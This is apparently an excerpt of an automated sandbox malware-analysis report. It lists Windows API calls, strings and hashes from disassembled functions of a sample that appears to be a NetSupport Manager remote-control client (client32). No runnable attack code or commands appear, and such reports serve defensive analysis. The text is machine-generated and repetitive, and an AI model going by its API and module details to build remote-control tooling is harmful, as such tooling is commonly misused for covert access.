                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                      • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                      • _sprintf.LIBCMT ref: 1103B2BB
                                                                                      • _fputs.LIBCMT ref: 1103B330
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                      • _free.LIBCMT ref: 1103B336
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                      • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 383231468-3762817415
                                                                                      • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                      • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                      Function 110CB2B0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 110CB339
                                                                                      • IsIconic.USER32(00000001), ref: 110CB349
                                                                                      • GetClientRect.USER32(00000001,?), ref: 110CB358
                                                                                      • GetSystemMetrics.USER32(00000000), ref: 110CB36D
                                                                                      • GetSystemMetrics.USER32(00000001), ref: 110CB374
                                                                                      • IsIconic.USER32(00000001), ref: 110CB3A4
                                                                                      • GetWindowRect.USER32(00000001,?), ref: 110CB3B3
                                                                                      • SetWindowPos.USER32(?,00000000,?,11185BBB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB467
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                      • API String ID: 2655531791-1552842965
                                                                                      • Opcode ID: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                      • Instruction ID: 7d040125c55bf73af4456014bc99c48d8e10f47c0045797434645e7542fd0d49
                                                                                      • Opcode Fuzzy Hash: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                      • Instruction Fuzzy Hash: 2C51C175E0061AAFCB10CFA4CC84FEEB7F8FB48754F0481A9E915A7280EA74A940CF50
                                                                                      Function 110F33F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                      • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                      • GetLastError.KERNEL32 ref: 110F3470
                                                                                      • Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                      • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                      • LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • pSD, xrefs: 110F3415
                                                                                      • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F3410
                                                                                      • CreateNamedPipe %s failed, error %d, xrefs: 110F3478
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                      • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                      • API String ID: 3134831419-838605531
                                                                                      • Opcode ID: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                      • Instruction ID: e749730b24da6d9d65aa5dc542e4a1298255c3932a1a24cca1bc6d9c8703c538
                                                                                      • Opcode Fuzzy Hash: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                      • Instruction Fuzzy Hash: 0821DD75E54229BBE7119B64CC8AFAFB76CE744719F014210FE25672C0C7B05A018790
                                                                                      Function 11033010 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                      • API String ID: 0-293745777
                                                                                      • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                      • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                      Function 11093080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                      • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                        • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                        • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                        • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                        • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                        • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                        • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                        • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                        • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                      • String ID: NSMClassList$NSMFindClassEvent
                                                                                      • API String ID: 1622498684-2883797795
                                                                                      • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                      • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                      Function 1115B1D0 Relevance: 13.6, APIs: 9, Instructions: 125windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                      • _memset.LIBCMT ref: 1115B266
                                                                                      • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                      • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                      • GetDesktopWindow.USER32 ref: 1115B309
                                                                                      • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2935161463-0
                                                                                      • Opcode ID: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                      • Opcode Fuzzy Hash: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                      Function 11063160 Relevance: 149.1, APIs: 42, Strings: 43, Instructions: 353libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                      • API String ID: 1096595926-1306570422
                                                                                      • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                      • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                      Function 11005360 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                        • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                      • wsprintfA.USER32 ref: 1100548D
                                                                                      • DeleteObject.GDI32(?), ref: 110054E2
                                                                                      • DeleteObject.GDI32(?), ref: 110054EB
                                                                                      • SelectObject.GDI32(?,?), ref: 11005502
                                                                                      • DeleteObject.GDI32(?), ref: 11005508
                                                                                      • DeleteDC.GDI32(?), ref: 1100550E
